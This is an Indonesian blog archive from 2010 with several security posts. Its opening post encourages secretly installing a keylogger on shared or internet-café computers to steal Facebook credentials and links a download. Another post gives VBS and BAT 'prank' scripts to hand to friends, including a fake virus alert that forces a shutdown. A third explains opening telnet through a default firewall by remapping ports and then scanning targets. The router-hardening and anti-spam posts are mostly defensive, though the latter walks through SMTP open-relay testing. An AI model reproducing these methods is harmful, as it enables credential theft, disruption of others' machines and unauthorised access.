Rabu, 24 Maret 2010

Hacking Facebook Dengan Keylogger

Tutorial hacking facebook kali ini membahas tentang hacking facebook dengan menggunakan keylogger. Software keylogger ini bisa mencuri username dan password facebook kita lho !! Ada yang tahu keylogger itu software apaan ?
Sebenarnya keylogger itu semacam software yang digunakan untuk memantau kegiatan keyboard komputer, setiap tombol yang di tekan oleh user maka semua record akan di simpan dengan keylogger.

Buat para orang tua biasa nya mereka memantau anak nya yang sedang browsing dengan cara memasang keylogger di komputer, jadi semua situs yang di “search” oleh si anak akan terekam oleh keylogger. sehingga semua situs yang berbau porno bisa langsung ketahuan oleh si orang tua.

Biasa nya keylogger akan di deteksi sebagai virus oleh “antivirus”, karena memang keylogger bisa menjadi 2 mata pisau yang bisa MENGAMANKAN dan juga bisa MEMATIKAN.

Maksud nya mematikan adalah, keylogger bisa saja di gunakan oleh orang-orang yang tidak bertanggung jawab untuk melakukan hacking, banyak orang ingin mencoba melakukan hack pada situs social networking seperti facebook dan friendster.

Jadi tinggal di instal di komputer lalu orang yang menggunakan komputer tersebut akan terekam seluruh kegiatan nya termasuk kegiatan memasukkan “password dan username” facebook dan friendster. bisa saja hal ini dilakukan oleh para pemilik warnet yang iseng dan tidak bertanggung jawab, atau bisa saja dilakukan oleh si pengguna komputer sebelum nya dengan cara mematikan fungsi antivirus nya terlebih dahulu lalu kemudian menginstall keylogger.

Untuk mendownload keyloggernya bisa di download [http://www.refog.com]
Read rest of entry

Meningkatkan Keamanan Jaringan Wireless

Hacker hanya membutuhkan waktu 50 detik untuk menerobos masuk ke dalam jaringan wireless yang tidak diproteksi dengan metode enkripsi terbaru. Lebih dari 50 persen jaringan wireless tidak cukup terlindung. Hal ini memang dapat dimaklumi karena mengon¬figurasi sebuah router WLAN dengan baik tidaklah mudah.
Berikut ini adalah langkah-langkah mengamankan jaringan Wireless :
Langkah 1

Melindungi Router
Router merupakan pusat komunikasi untuk seluruh jaringan Anda. Area ini tidak boleh ditembus oleh hacker. Tips-tips berikut akan mencegah penyusup masuk ke WLAN Anda.
Untuk konfigurasi pertama, Anda membutuhkan sebuah kabel jaringan untuk menghubungkan PC dengan router. Semua konfigurasi yang dibahas di artikel ini, diambil dari Linksys WRT310N yang banyak tersedia di pasaran. Untuk merek-merek lain, cara konfigurasinya hampir mirip, hanya berbeda pada penamaan dan struktur menu. Semua router, kecuali Apple AirPort Extreme, dapat dikonfigurasi melalui web interface yang diakses melalui browser seperti Firefox atau Internet Explorer.
Pada router Linksys, alamat yang digunakan adalah http://192.168.1.1. Untuk router lain alamat ini dapat dilihat di buku petunjuknya.

PASSWORD ROUTER : Setelah memasukkan alamat router, Anda akan diminta memasukkan password Administrator. Untuk Linksys, kosongkan kolom “User Name” dan masukkan “admin” sebagai password-nya. Password ini sebaiknya langsung diubah agar hacker tidak dapat melihat konfigurasi jaringan Anda hanya dengan password standar ini.

Untuk mengubah password ini, klik menu “Administration | Management” dan ketikkan sebuah password baru pada kolom “Router Password”. Panjang password minimal enam karakter, terdiri atas huruf dan angka serta bukan berupa kata. Setelah itu, simpan setting dengan mengklik “Save Settings”.

UPDATE FIRMWARE : Seperti halnya Windows Update, produsen router wireless menutup celah keamanan dalam perangkat Anda dengan memberikan firmware update. Selain itu, performa router pun semakin cepat.

Untuk mempersiapkan upgrade router, backup semua setting router agar konfigurasi seperti konfigurasi akses ADSL tidak hilang. Namun, tidak perlu repot-repot. Sebuah fungsi tersedia untuk melakukan seluruh backup. Untuk router Linksys, masuklah ke menu “Administration | Backup and Restore”.

Kemudian, klik tombol “Backup Configurations”. Simpan file konfigurasi tersebut di tempat yang aman.
Setelah backup selesai, lakukan update yang sebenarnya. Di sini, komputer harus terhubung ke router melalui kabel agar koneksi tidak terputus. Hati-hati! Apabila koneksi WLAN terputus selama proses update, router Anda akan rusak. Hanya satu solusinya, bawa router Anda ke service centre.

Bergantilah ke menu “Administration | Firmware Upgrade | Browse” dan pilih file update firmware yang telah Anda download sebelumnya. Terakhir klik “Start to Upgrade”. Selanjutnya, proses update akan berlangsung dan Anda dapat melihat progresnya dari visualisasi yang diberikan. Pasokan listrik tidak boleh terputus selama proses ini. File firmware update yang telah di-download harus disimpan pada komputer terlebih dahulu. File ini dapat Anda download dari website vendor router masing-masing. Untuk router Linksys, kunjungi http://www-id.linksys.com untuk mendapatkan update firmware terbaru.

Bila setting hilang saat update dilakukan, Anda dapat mengembalikan konfigurasi melalui menu “Administration | Backup and Restore | Restore Configurations”.

ENKRIPSI WLAN : Router Anda sudah menggunakan firmware terbaru. Daerah konfigurasi pun sudah terproteksi dengan password. Sekarang, Anda masih harus mengamankan WLAN yang sesung¬guhnya. Anda memiliki pilihan antara metode enkripsi berikut: WEP (Wired Equivalent Privacy), WPA PSK (WiFi Protected Access – Pre Shared Key), dan WPA2-AES (WiFi Protected Access2 – Advanced Encryption Standard). WEP tergolong tidak aman karena dapat dijebol dengan software khusus dalam hitu¬ngan menit. Perangkat tua dengan enkripsi WEP tidak lagi aman untuk sebuah jaringan. Sebaiknya, Anda tetap menggunakan WPA.
Untuk itu lakukan langkah-langkah berikut ini.
Aktifkan dahulu WLAN melalui menu “Wireless | Basic Wireless Settings”. Pilih “Manual” untuk konfigurasi secara manual. Linksys menyediakan pilihan “Wi-Fi Protected Setup” yang memudahkan Anda melakukan konfigurasi router — cukup dengan menekan satu tombol di perangkat router Linksys.

Asumsi setting yang dilakukan adalah memilih option “Manual”. Jadi, selanjutnya berikan nama pada kolom “Network Name (SSID)”. Nantinya, nama ini akan muncul dalam daftar jaringan yang tersedia di Windows. Bila Anda ingin jaringan wireless Anda tidak terlihat oleh orang lain, pilih “Disabled” pada menu option “SSID Broadcast”.

Selanjutnya adalah melakukan setting keamanan. Masuklah ke “Wireless | Wireless Security”. Di bagian “Security Mode”, pilih “WPA2 Personal”. Sekarang, tambahkan sebuah password untuk jaringan yang nantinya dipakai client untuk mengakses WLAN. Masukkan sebuah password di kolom “Passphrase” dengan panjang minimal 10 karakter dan terdiri atas huruf dan angka. Aktifkan setting keamanan ini dengan mengklik “Save Settings”.

MAC FILTERING : Keamanan tambahan dapat diperoleh dengan melakukan pemblokiran terhadap alamat MAC (Media Access Control) yang tidak dikenal. Seperti halnya fungsi sebuah nomor rangka pada kendaraan, setiap perangkat jaringan pun diberi identitas alamat tertentu.

Walaupun seseorang mengetahui password WLAN, password tersebut tidak akan berguna apabila menggunakan komputer dengan alamat MAC yang tidak diotorisasi. Alamat ini memang dapat ditemukan oleh hac¬ker, dengan cara memantau lalu lintas data dalam jaringan. Namun, feature ini tetap menawarkan keamanan ekstra.

Untuk mengaktifkan feature ini, masuk¬lah ke menu “Wireless | Wireless MAC Filter” dan klik “Enabled” untuk mengaktifkan featue MAC Filtering. Kemudian, pilih “Prevent PCs listed…” agar hanya PC dengan MAC Address terdaftar yang dapat mengakses WLAN Anda. Mode keamanan ini memang sedikit merepotkan karena Anda harus memasukkan satu persatu MAC Address komputer yang boleh masuk ke jaringan wireless Anda. Terakhir, untuk mengaktifkan mode ini, konfirmasikan dengan “Save Settings”.
Langkah 2

Mengkonfigurasi Client
Untuk konfigurasi client, hal yang harus diperhatikan adalah masalah driver yang aktual dan update. Ini untuk memastikan jaringan menggunakan koneksi WPA2 yang aman dan dapat browsing dengan kecepatan maksimal.

INSTALL DRIVER BARU : Ins¬tall driver versi terbaru yang diperoleh dari website produsen WLAN-Client. Pengguna dengan notebook Centrino dapat melakukan cara yang lebih mudah.
Penting: Uninstall lebih dahulu driver yang lama melalui menu “Start | Control Panel | Add/Remove Programs” sebelum Anda menjalankan prosedur instalasi.

MENGAKTIFKAN KONEKSI JARINGAN : Lepaskan koneksi kabel antara router dan PC. Setelah itu, klik icon WLAN di sebelah kanan, di bagian bawah systray Windows. Akan muncul sebuah daftar yang berisi semua jaringan wireless yang tersedia. Klik WLAN Anda dan ketik password untuk jaringan tersebut. Windows akan mengingat password ini dan akan membuat koneksi secara otomatis untuk ke depannya.

MENGATASI MASALAH PERFORMA : Untuk jaringan yang sudah aman, tetapi performanya sangat lambat, sebaiknya Anda mengganti channel-nya. Untuk itu, masuk-lah ke Web Configuration Linksys.

Melalui menu “Wireless | Wireless Security “, ubah channel dalam menu “Standard Channel” ke salah satu berikut ini: 1, 6, atau 11. Pemilihan channel ini sesuaikan dengan kondisi jaringan wireless di sekitar Anda.

Kepadatan WLAN yang tinggi dapat menimbulkan masalah performa, terutama untuk proses streaming HD-Video. Apabila kecepatan tidak memadai setelah optimasi channel dilakukan, gunakan alternatif yang kami sarankan ini untuk perangkat HD-Multimedia dalam jaringan Anda. Dengan cara ini, jaringan terkoneksi dengan kecepatan yang optimal dan berselancar dalam sebuah jaringan bebas hac¬ker.
Frekuensi 5 GHZ: Jalur WLAN Baru

Kebanyakan perangkat WLAN memancarkan frekuensi yang “sesak”, yaitu 2,4 GHz. Artinya, tidak hanya WLAN yang menggunakannya. PC dan perangkat elektronik lain, seperti DECT Phone, headset Bluetooth atau microwave, juga bekerja pada frekuensi 2,4 GHz sehingga dapat mengganggu sinyal.

Perlengkapan antena router pun berperan penting. Bila router Anda hanya menyediakan sebuah antena, arahkan antena ini miring ke bawah agar cakupan pancarannya semakin luas. Router keluaran terbaru biasanya menyediakan beberapa antena internal sekaligus dan telah terkonfigurasi secara otomatis.

Perangkat yang menjadi rekomendasi adalah router yang telah menggu¬nakan teknologi MIMO (Multiple Input Multiple Output). Salah satu di antaranya adalah Netgear Bridge WNHDEB111. Selain untuk frekuensi 2,4 GHz, perangkat ini dapat digunakan untuk frekuensi 5 GHz. Sayangnya, frekuensi ini hanya menyediakan jumlah channel yang terbatas. Dengan router Netgear, Anda dapat ber¬alih ke 5 GHz tanpa harus kehilangan kecepatan jaringan. Peralatan ini terdiri atas dua perangkat yang saling terhubung dalam frekuensi 5 GHz, dengan bandwidth sekitar 300 Mbit/s. Kinerja ini penting, misalnya untuk streaming video HD.

Instalasi HD-Bridge cukup mudah. Pertama, hubungkan kedua adapter dengan kabel antara perangkat yang ingin diaktifkan dengan koneksi wireless highspeed. Setel switch kecil di bagian belakang kedua wireless module ini ke posisi »Auto«. Lalu, tekan tombol »WPS« di bagian depan pada salah satu Bridge Adapter. Dalam waktu dua menit, Anda harus menekan tombol yang sama pada adapter yang kedua.

Dinding tebal merupakan masalah besar bagi setiap WLAN. Dengan sebuah LAN Adapter, Anda dapat membangun network yang aman melalui jaringan listrik.

Tidak harus selalu nirkabel. Bila pancaran 2,4 GHz dari WLAN tidak lagi efektif, Anda dapat menggunakan HomePlug-Adapter dari AzTeCH untuk mengirim data. Teorinya, data dapat dialirkan de¬ngan bandwidth sampai 200 Mbit/detik melalui jaringan listrik 230 Volt. Praktik¬nya, performa yang diperoleh maksimal hanya 85 Mbit/s. Namun, kecepatan ini cukup untuk menikmati streaming HD-Video.

Sumber : chip
Read rest of entry

Iseng Bermodal Notepad

Bosen dengan belajar, mau iseng? Yuk, kita pakai cara sederhana saja untuk ngisengin teman kita sendiri. Tapi jangan anda coba trik ini di komputer anda, klo dicoba berarti anda mengisengin diri anda sendiri & dapat dibilang anda melakukan tindakan yang stup*d.. Hehe.. Wkwk..

Lets begin! Pastikan Anda Mengetik Dengan Benar Script Dibawah Ini! Copy Paste Kadang Tidak Berhasil Dikarenakan Perbedaan Tanda Petik ( ” ” ) Pada Notepad, Untuk Lebih Fix Bisa Pake TextPad..

1. Iseng Mengeject CD-Drive Terus Menerus

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Kemudian save dengan “sarudikcrew.VBS” & Berikan keteman Anda

2. Iseng Dengan Tombol Enter Terus Menerus

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

Kemudian save dengan “sarudikcrew.VBS” & Berikan keteman Anda

3. Iseng Dengan Pesan Lambat Notepad “Hello, how are you? I am good thanks!”

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(”WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “

Kemudian save dengan “sarudikcrew.VBS” & Berikan keteman Anda

4. Iseng Dengan Backspace

MsgBox “Maaf, Anda Harus Mengulang Kembali”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

Kemudian save dengan “SUKASUKAANDA.VBS” & Berikan keteman Anda

5. Iseng Dengan Membuka Calculator Terus Menerus

@ECHO off
:top
START %SystemRoot%\system32\cacl.exe
GOTO top

Kemudian save dengan “sarudikcrew.BAT” & Berikan keteman Anda

6. Iseng Dengan Keyboard

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “Maaf, Keyboard Tidak Berfungsi! Harap Diperbaiki”
loop

Kemudian save dengan “sarudikcrew.VBS” & Berikan keteman Anda

7. Iseng Dengan Shutdown Computer

@echo off
msg * Komputer Anda Terinfeksi Virus
shutdown -c “Error! Virus Menyebar Keseluruh System!” -s -t 0

Kemudian save dengan “sarudikcrew.BAT” & Berikan keteman Anda

Semoga Bermanfaat

Sumber : Binushacker
Read rest of entry

Senin, 22 Maret 2010

Anti Spam

Berikut adalah pertanyaan yang sering ditujukan ke milis mengenai spam dan
jawabannya
1. Apakah Spam itu ?
Spam adalah pengiriman surat kepada orang yang tidak kenal yang biasanya
berisi penawaran mengenai business.

2. Kalau spammer ?
Spammer adalah orang yang melakukan spam tadi

3. Junk mail ?
Junk mail terus terang sangat luas cakupannya, misalnya spam tadi
sebetulnya bisa dikategorikan junk mail, atau contoh lain anda mengirimkan
pesan UNSUBSCRIBE ke milis juga termasuk junk, jadi secara garis besar ,
junk mail berarti :
- Bagi Mailling List : message yang tidak ada hubungannya dengan milis
tersebut
- Bagi user : message yang tidak kita kehendaki, misalnya teman anda
mengirimkan penawaran ikut MLM ke anda, itu junk.

4. Bagaimana caranya menghindari spam ?
Anda tidak dapat dapat menghindarinya jika anda menjadi anggota komunitas
internet yang aktif , misalnya dalam hal ini sering ikut mailling list.
Bahkan jika anda pasif sekalipun, anda dapat pula menerima spam tadi. Lho
bagaimana caranya ?
Bisa saja anda ikut mailling list, tapi anda tidak pernah posting, tapi
karena mailling list tersebut mengijinkan user untuk mendapatkan list
subscriber milis tadi, dari situ ia dapat mendapatkan alamat anda. Selain
itu, adanya suatu kelemahan di standard RFC untuk SMTP dimana anda dapat
mengetahui suatu user name ada atau tidak di server tadi dengan melakukan
telnet port 25, lalu ketik VRFY username, maka dari sini spammer dengan
cara brute forte (dicobain dari 0 sampe 10, a sampe zzzzzzzz (8 karakter
kan biasanya ?) )dapat mengetahui email email address yang ada di server itu.
Pencegahan sudah ada, dengan cara mendisable perintah VRFY tadi, misalnya
postfix patch terbaru, atau Qmail (CMIIW)

5. Apa yang harus saya lakukan jika menerima spam ?
Pertama jangan takut, sebab spam tidak sama dengan mail bomb, umumnya spam
yang anda terima tidak akan mencapai puluhan per hari, terkadang hanya 1
per minggu.
Jika anda malas, anda tinggal delete spam tadi, persoalan beres.
Tapi jika anda penasaran dan ingin membereskan spammer tadi, ada langkah
langkah yang harus anda lakukan berikut. Percuma anda me mail bomb orang
tadi, karena selain buang buang waktu, biasa alamat yang diberikan oleh
spammer tadi adalah fake address, jadi .... percuma kan ?

6. Cara spammer menyebarkan spam
Hal ini dibedakan menjadi 3 yaitu :
- Direct to MX spamming
- Spamming melalui mail server yang open relay

Kita akan membahasnya berikut
- Direct to MX spamming
Ilustrasinya adalah begini, ambillah suatu provider yang mail servernya
tidak open relay, misalnya cbn , dimana jika anda misalnya menggunakan
centrin.net dan anda ingin mengganti SMTP server anda dari
smtp.centrin.net.id / mail/bdg/sby.centrin.net.id menjadi
mail.cbn.net.id/smtp.cbn.net.id maka anda tidak akan dapat. Begitu anda
ingin coba kirim surat ke misalnya saya di iname.com , maka mail server cbn
tadi akan menolak, alhasil suratnya nggak bakalan kekirim. Tapi kalau anda
ingin mengirimkan surat ke sianu@cbn.net.id , maka anda dapat.

Untuk jelasnya coba anda jalankan telnet (start-run-telnet.exe)
lalu anda alt-connect-remote isikan misalnya mail.cbn.net.id (TAPI ANDA
HARUS MENGGUNAKAN PROVIDER SELAIN CBN), pada portnya anda isikan 25 lalu enter
lalu anda ketik
HELO
mail from: dodolgarut@centrin.net.id
rcpt to: dodolmanis@centrin.net.id
Maka akan ada tulisan Sorry we do not relay, atau This host is not in my
rcpthosts, atau sebagainya

Tapi misalnya anda konek menggunakan cbn.net.id maka setelah anda mengetik
rcpt to: dodolmanis@centrin.net.id
maka di sampingnya akan ada tulisan ok, tanda anda boleh menggunakan mail
server cbn tadi untuk mengirim ke dodolmanis@centrin.net.id
Setelah itu anda ketik
DATA
lalu isi messagenya dan diakhir dengan . (titik) lalu enter

Maka akan ada pesan bahwa message anda telah diaccept dengan diberi nomor ,
lalu siap untuk dikirim

[tapi jika anda konek dengan cbn, dan anda ingin mencoba, maka anda boleh
mencoba dengan smtp lain yang tidak open relay misalnya
smtp.centrin.net.id, atau mail.bit.net.id)

TAPI jika pada contoh di atas, misalnya anda konek dengan centrin, terus
mencoba dengan mail.cbn.net.id , lalu pada RCPT TO: anda isikan
sidodol@cbn.net.id , maka pasti bisa.

Nah pada direct to MX spamming hal ini sama juga, misalnya pada hotmail,
dengan pelanggan 60 juta, dan si spammer sudah punya 100 ribu address di
hotmail yang akan dispamming, maka ia tinggal telnet port 25 di
mail.hotmail.com , lalu pada rcpt to: nya ia tinggal isikan semua address
yang ia tujukan, padahal mail.hotmail.com itu tidak open relay.

Jadi pada intinya Direct to MX spamming adalah penggunaan mail server
tempat si target yang ingin dispam , untuk menyepam dia .
Contohnya dari header surat yang diterima adalah :
----------------------------------------------------
From: <sender994@mindspring.com> Save Address Block Sender
Subject: Congratulations!
Date: Sat, 18 Dec 1999 11:29:35
MIME-Version: 1.0
Received: from [38.30.13.169] by hotmail.com (3.2) with ESMTP id
MHotMailBA2502CC0010D820F3BC261E0DA90F640; Sat Dec
18 08:35:29 1999
From sender994@mindspring.com Sat Dec 18 08:49:04 1999
Message-Id: <480.595739.647571@mindspring.com>
-------------------------------------------------------
Tampak, bahwa seseorang dengan IP 38.30.13.169 konek langsung ke
hotmail.com untuk menyepamm email account saya di hotmail, pada sat dec 18
, jam 08:35:29 tahun 1999 waktu hotmail, padahal waktu di komputer spammer
tadi sat dec 18 08:39:04 1999

Nah itu pada message idnya ada tulisan mindspring.com , yaitu salah satu
provider terbesar di Indonesia, itu hanya untuk mengecoh orang yang masih
"newbie" dalam soal spam menyepamm, agar dikira dia konek pakai
mindspring.com, padahal sebetulnya dia si 38.30.13.169 tadi, pake PSI.net
coba lihat hasil lookup berikut
--------------------------------------------
Host name: ip169.isdn14.800.psi.net
IP address: 38.30.13.169
Alias(es): None
--------------------------------------------

jadi ternyata si 38.30.13.169, dengan nama lainnya adalah
ip169.isdn14.800.psi.net, yang menyepamm saya,.
Wah sudah, tinggal saya kirimkan surat ke abuse@psi.net, minta agar si
spammer ini dibereskan, dab biasanya kalau di amerika itu beneran
dibereskan, bahkan biasanya account di disable (ditutup), contohnya
-----------------------------------------------
Date: Thu, 23 Dec 1999 16:17:16 -0500 (EST)
Message-Id: <199912232117.QAA03498@utility1.troy.psi.com>
X-Loop-Detect: PSINet/nab
X-UIDL: 945997405.158
From: Net Abuse Team <abuse@psi.com>
To: irwanhadi@iname.com
Subject: Re: Increase Your Revenues and Pay Your Bills ! (27026) #nab-1629170
Status: U

Hello,

Please be advised that the account used to violate our Net-Abuse
Policy has been disabled. If you receive any further correspondence
from this source, please let us know.

When submitting a complaint to PSINet, please include the SUBJECT
LINE of the spam in the subject of your e-mail.

Thank you.

Net-Abuse Team
PSINet, Inc.
abuse@psi.com
http://www.psinet.com/legalinfo/netabusepolicy.html

-----------------------------------------------------

Nggak seperti di Indonesia sini, boro boro di disabled, mau ditegor aja si
spammer sama adminnya juga udah bagus.
Terus terang saja berdasarkan pengalaman saya selama ini, provider di
Indonesia yang terbaik dalam soal komplain spam adalah CBN, dan yang paling
buruk, hehehehee C.NTR.N
Yang lain nggak tau, soalnya belum pernah ada orang nyepamm lewat provider
lain ke saya.

Pada account hotmail saya, biasanya ada 4 provider besar yang kebetulan
usernya sangat banyak juga, yang suka direct to MX spamming , mereka yaitu
uu.net, biasa dengan IP di kepala 6x.xxx.xxx.xxx
PSI Net , biasa di IP kepala 3x.xxx.xxx.xxx
BBNPlanet, biasa di IP 4.xxx.xxx.xxx
Aol . biasa di 16x.xxx.xxx.xxx

- Spamming melalui mail server yang open relay
Jika anda telah mengerti Direct to MX spamming, maka anda dengan mudah
mengerti yang ini, dimana sama seperti pada direct to MX spamming, tapi
pada mail server yang open relay, begitu anda ketik rcpt to:
somebody@somesite.com , maka dia akan ok

Contohnya adalah berikut ini
------------------------------------------
>Received: from rmx09.globecomm.net (rmx09.iname.net [165.251.8.95]) by
>dpnegoro.bit.net.id (8.8.5/BITNET5) with ESMTP id XAA22356 for
><xxxxxxx@dpnegoro.bit.net.id>; Sun, 31 Oct 1999 23:04:48 GMT
>Received: from smv15.iname.net by rmx09.globecomm.net (8.9.1/8.8.0) with
>SMTP id RAA10078 ; Sun, 31 Oct 1999 17:59:21 -0500 (EST)
>Received: from data99.cz (www.data99.cz [193.179.185.105])
> by smv15.iname.net (8.9.3/8.9.1SMV2) with ESMTP id RAA22733;
> Sun, 31 Oct 1999 17:56:41 -0500 (EST)
>Received: from fij909 [38.26.242.169] by data99.cz with ESMTP
> (SMTPD32-5.05) id A9001180180; Sun, 31 Oct 1999 23:56:00 +0100
>From: "Rudy" <benk9@lakmail.com>
>Subject: Want More Sales?
>To: look38j@iname.net
>X-Mailer: Microsoft Outlook Express 4.72.1712.3
>X-MimeOLE: Produced By Microsoft MimeOLE V(null).1712.3
>Mime-Version: 1.0
>Date: Sun, 31 Oct 1999 17:01:17 -0500
>Content-Type: text/plain; charset="iso-8859-1"
>Message-Id: <199910312356876.SM01216@fij909>
>Content-Transfer-Encoding: 8bit
>X-MIME-Autoconverted: from quoted-printable to 8bit by smv15.iname.net id
>RAA22733
----------------------------------------------------

Tampak seseorang dengan IP 38.26.242.169, menggunakan mail server
data99.cz, atau aliasnya adalah www.data99.cz , dengan IP mail server itu
adalah 193.179.185.105 yang open relay untuk menyepamm saya.
orang itu pakai outlook express dari mikocok untuk nyepamm saya.

Nah contoh ini jelas, mail server data99.cz harusnya tidak boleh open relay
, tapi dia ternyata bisa dipakai oleh orang yang tidak dalam satu sub net
block 193.179.x.x nya, yaitu dari 38.26.242.169 , maka ini open relay.
Anda pun juga bisa menggunakannya,selama mail server tadi belum diperbaiki
oleh adminnya.

Nah siapakah orang dengan IP 38.26.242.169 tadi ?
Mudah, kita lookup, maka hasilnya adalah
-----------------------------------
Host name: ip169.providence11.ri.pub-ip.psi.net
IP address: 38.26.242.169
Alias(es): None
-----------------------------------

Ups, dari psi.net juga, dia lokasinya bahkan sangat jelas, dia berada di
kota providence, yang berada di state RI (rhode Island) di Amerika.

So, mudah, tinggal saya komplain lagi ke abuse@psi.net , maka.......
biarkan orang psi.net membereskan spammer tadi.

-----------------------------------------------
Setelah jelas mengenai 2 jenis metode spamming yaitu direct to MX spamming
dan spamming melalui mail server yang open relay, maka kita bisa lanjut ke
lesson berikut


7. Bagaimana cara melacak spammer ?
Anda bisa melacaknya melalui IP yang digunakan, karena 98% kasus spamming,
maka IP address yang digunakan spammer tadi pasti akan masuk di header, dan
anda dapat melacaknya.
Kuncinya adalah anda HARUS dapat melihat full header dari message tadi,
kalau di hotmail misalnya pilih options lalu preferences, lalu pilih pada
bagian show header : full header.
Di yahoo mail sama juga, kalau anda pakai Eudora, anda tinggal klik tombol
blah blah blah button di sebelah kiri atas, kalau anda pakai mikocok
outlook express bagaimana ? Nah itu anda temukan sendiri saja, soalnya saya
tidak pernah dan tidak akan pernah pakai outlook express.

Memang ada beberapa mail server di internet yang saya tahu, yang anonymous,
bahkan di Indonesia ada juga, milik salah satu bank, dimana jika IP address
anda TIDAK akan muncul di header, yang muncul hanyalah begini misalnya

Received: from suatubank.co.id by suatubank.co.id with SMTP
.......................
harusnya kan muncul nya begini
Received: from testing[202.147.xxx.xxx] by suatubank.co.id with SMTP
...........

testing adalah kata yang saya isikan pada pada saat HELO
jadi begini, kalau anda telnet port 25, suatu mail server, lalu pas
HELO , anda isikan misalnya kucingku
Maka yang akan tampil di header adalah :
Received: from kucingku[IP ANDA SAAT ITU] by mailserver.yang.anda.gunakan
with SMTP .........

Nah setelah anda dapatkan IP si spammer, maka anda bisa mencoba untuk
lookupnya, misalnya di linux pakai $ dig -x IP atau di windows anda bisa
cari utility netlab di tucows (www.tucows.com)

8. Apa yang harus saya lakukan selanjutnya jika saya menerima spamm ?
Seperti yang telah ditulis di atas, anda dapat langsung mendeletenya, tapi
diharapkan anda setelah membaca surat ini, tolong jangan didelete begitu
saja spammnya, tapi anda sebaiknya ikut untuk menghentikan aksi keganasan
spammer ini

Untuk jenis Direct to MX spamming, anda cukup laporkan ke
abuse@provider.yang.digunakan.si.spammer
tapi untuk jenis yang open relay spamming, anda tolong forward spamm tadi ke
relays@mail-abuse.org , dan relays@orbs.org
pada body nya, anda tulis

Relay: xxx.xxx.xxx.xxx
xxx.xxx.xxx.xxx adalah IP dari mail server yang open relay.

ingat, jangan sampai salah tulis dengan
relay : xxx.xxx.xxx.xxx , karena messagenya anda akan dibalikin.

Ini adalah langkah untuk membatasi ruang gerak si spammer, sehingga dengan
demikian si spammer akan lebih sulit untuk beraksi.
Read rest of entry

Bermain dengan Firewall Default

Selama ini mungkin anda beranggapan bahwa firewall adalah suatu dinding
penjaga keamanan dari sebuah network yang tidak mungkin ditembus.
Sayangnya (atau untungnya - tergantung persepsi anda), banyak
administrator sistem yang malas dan mengandalkan instalasi 'default' yang
diterima (out of box).

Firewal-firewall seperti inilah yang mempunyai banyak kelemahan. Artikel
ini ditujukan untuk mereka yang sudah punya akses di dalam firewall, dan
membutuhkan jalan untuk mencapai akses tersebut melalui jaringan luar
(internet, contohnya). Platform yang digunakan adalah Linux dan untuk
UNIX-UNIX lainnya, cara kerja hampir sama.

Misalkan workstation anda di kantor menyimpan segala pekerjaan anda. Namun
sayangnya LAN di kantor dilindungi oleh sebuah Firewall. Anda ingin akses
ke workstation di kantor supaya anda bisa menyelesaikan pekerjaan dari
rumah atau tempat lain. Nah, disinilah bergunanya teknik 'firewall
bypassing'.


# port
/-------\ /-------\<------------ telnet (23)
| | | |<------------ ftp (21) /--------\
|kotak. |<-------| fire |<------------ ssh (22) INTERNET
|linux. | 25 | wall |<------------ www (80)
|anda |<-------| |<------------ mail (25) \--------/
| | <1024 \-------/ <----------- imap (143)
\-------/
( ilustrasi lalu lintas data dari internet ke kotak linux anda dengan
melewati firewall)



Instalasi firewall secara default biasanya mengizinkan koneksi ke port 25
(SMTP - protokol transfer e-mail), dan sebagian besar koneksi ke port
dengan nomor lebih besar daripada 1024. Memang banyak sysadmin yang
mengabaikan hal ini, ataupun jika ada yang tahu, biasanya hanya dibiarkan
saja, sebab koneksi keluar server biasa menggunakan lokasi-lokasi dengan
nomor port >1024.

Cara yang paling cepat untuk mengakali sang firewall agar bisa menerima
koneksi telnet dari luar adalah dengan mengubah setting skema portmapping
Linux anda. Edit file /etc/inet.conf anda, dan cari entri yang berisi

smtp stream tcp nowait root

dan ubah isinya menjadi

smtp stream tcp nowait root /usr/sbin/tcpd in.telnetd

Aha. Tinggal anda reload file inetd.conf, dan kill sendmail. Sekarang port
email anda sudah siap untuk menerima koneksi telnet (bisa langsung anda
'telnet mesin.target.net 25').

Cara yang lain untuk memperoleh hasil yang sama (tanpa mengorbankan
sendmail), adalah dengan mengubah setting port penerima telnet (port 23),
dan memberitahukan mesin anda agar menerima telnet lewat port diatas 1024.
Buka file /etc/services dan cari entri yang berisi

telnet 23/tcp

dan ubah isinya menjadi

telnet 1069/tcp
(atau port lain >1024 pilihan anda).

Cara ini akan membuka jalan telnet untuk masuk lewat port 1069 tanpa
menghiraukan proteksi firewall. Tentu saja anda perlu mengulang inetd dan
sebagainya, namun anda tidak perlu membunuh mail server anda. Cara ini
tentu saja tidak terbatas ke penggunaan telnet biasa. Daemon-daemon
seperti rsh, dan secure shell daemon bisa juga digunakan untuk menerima
koneksi selain dari port defaultnya (ssh port 22).

Nah, begitu dulu sedikit penjelasan ini. Pasti diantara anda banyak yang
masih bingung atau masih mencari-cari jalan masuk ke mesin terlindung
firewall tanpa akses fisik ke target. Saran penulis adalah agar anda
mencoba-coba menjalankan program 'scanner' seperti nmap (tersedia di arsip
kecoak). Jika kebetulan mesin target anda menjalankan web server, maka
bisa juga anda coba bermain dengan port http (80), atau mencoba mencari
